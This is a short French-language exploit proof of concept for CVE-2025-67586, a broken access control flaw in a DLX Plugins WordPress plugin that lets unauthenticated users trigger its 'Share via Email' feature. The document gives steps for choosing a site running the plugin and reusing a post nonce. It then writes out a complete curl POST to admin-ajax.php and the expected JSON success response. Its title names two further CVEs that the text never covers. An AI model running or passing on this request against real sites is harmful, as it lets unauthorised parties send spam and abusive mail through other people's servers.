
analyses pour (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
Analyses pour (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
-------------- CVE-2025-67586 Exploit PoC --------------
==> Description Une vulnérabilité de contrôle d'accès cassé existe dans un plugin WordPress développé par DLX Plugins. Le plugin expose une action AJAX non authentifiée qui permet aux attaquants d'abuser de la fonctionnalité « Share via Email » sans vérifications de permissions appropriées.
Un attaquant non authentifié peut réutiliser un nonce de publication valide pour déclencher des demandes de partage par e-mail, conduisant à l'envoi d'e-mails non autorisés (spam / abus) sans authentification de l'utilisateur.
==> Privilèges requis Aucun (non authentifié)
==> Preuve de concept (PoC)
Étape 1 : Choisissez un site Web avec le plugin installé
Étape 2 : Obtenez un nonce valide
Étape 3 : Exploitation via une requête non authentifiée
commande bash : (remplacez l'URL du site Web, l'URL de l'article et le nonce)
curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed
--> Réponse JSON attendue :
{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }